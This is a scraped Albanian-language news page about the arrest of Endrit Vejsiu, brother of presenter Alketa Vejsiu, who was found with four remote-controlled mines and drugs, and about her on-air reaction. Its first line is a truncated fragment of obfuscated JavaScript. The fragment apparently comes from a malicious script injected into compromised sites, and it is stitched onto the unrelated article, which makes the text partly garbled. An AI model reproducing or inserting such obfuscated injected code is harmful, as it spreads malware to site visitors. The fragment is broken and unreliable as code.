;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I arrestuan vëllain, Alketa Vejsiu reagon për herë të parë nga spektakli “Dance with me”

By

Endrit Vejsiu, 29 vjeçari që u kap një ditë më parë me drogë dhe mina me telekomandë në makinë nuk rezulton person me precedentë penalë derisa  siç raportojnë mediat shqiptare, ai është vëllai i prezantueses së njohur Alketa Vejsiu.

“Gjithçka që ndodh jashtë nuk interferon në muzikën e jetës këtu brenda”.

Kështu është shprehur moderatorja Alketa Vejsiu sapo ka nisur shfaqjen e mbërmjes së sotme të “Dance With me 3”, duke nënkuptuar mesazhin se pavarësisht se vëllai i saj është arrestuar, ajo do të vazhdojë normalisht me shfaqjen. Një ditë më parë, vëllai i Alketa Vejsiut ra në pranga pasi iu gjetën 4 mina me telekomandë në automjet.

Vëllai i moderatores u kap gjatë operacionit “Telekomanda”, teksa po qarkullonte me një mjet tip “Opel” dhe gjatë kontrollit u konstatuan në gomën rezervë në bagazh katër mina me telekomandë dhe një sasi lënde narkotike, raporton Lapsi.al.

Ai u arrestua menjëherë për veprat penale “Prodhim dhe shitje e lëndëve narkotike” dhe “Trafikim i lëndëve plasëse”.

Burime nga grupi i hetimit bënë të ditur se ka pasur informacion paraprak për veprimtarinë e të riut nga Tirana, i cili do të kryente transportin e minave me telekomandë, që dyshohet se do të përdoreshin nga porositësit për qëllime kriminale.

 

Artikuj të ngjashëm